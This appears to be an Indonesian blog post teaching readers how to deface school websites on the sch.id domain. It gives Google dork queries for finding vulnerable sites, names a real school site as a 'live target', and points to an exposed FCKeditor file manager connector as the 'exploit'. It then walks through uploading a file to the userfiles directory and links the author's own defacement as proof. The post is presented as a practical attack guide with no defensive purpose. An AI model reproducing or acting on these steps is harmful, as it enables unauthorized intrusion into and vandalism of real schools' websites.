trik ini membahas tentang
cara deface web sekolah sch.id, udah
padan pinter deface kan ? ya uda monggo langsung aja kita praktekan sama sama
:D
pertama siapin dulu
perlatanya !! file .txt dari notepad (isinya terserah anda mau nama pacar nenek
ibuk kaka terserah) nama gue juga boleh ! hahaha
udah buat file kan ? yauda
monggo lanjutt !
buka google dulu ! terus
masukin Dork (kata kunci) nih gue udah ada Dork tinggal pilih aja :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
setelah ngetik Dork tersebut kan ada banyak web sekolah tuh ? kita tinggal pilih aja wkkakka nih gue ada
Live Target : http://sman1kotabaru.sch.id/
lalu siapin Exploit dulu , tenang aja gue udah punya exploitnya nih :
Exploit: /editor/filemanager/connectors/test.html
lalu siapin Exploit dulu , tenang aja gue udah punya exploitnya nih :
Exploit: /editor/filemanager/connectors/test.html
langsung saja di hajar !
masukin exploit tadi ke url web sch.id
nah, udah muncul kan yang
mau di pepes !
pada kolom Connector *ASP
ubah menjadi *PHP terus kolom Resource Type ubah jadi *FILE
lalu klik Browse (cari file
.txt yang kamu buat tadi) > Upload
setelah berhasil di upload , Lo bka aja hasilnya
http://sitetarget.sch.id/userfiles/namafileLo.txt
atau => http://sitetarget.sch.id/userfiles/file/namafileLo.txt
mudah kan Bro ? nih hasil deface web sch.id punya gue ::
http://sman1kotabaru.sch.id/userfiles/file/belink-pecah.txt
wkakka udah bisa pepes kan
? ini masi upload file, kalo ente udah jago bisa rubah indexnya :D
0 comments: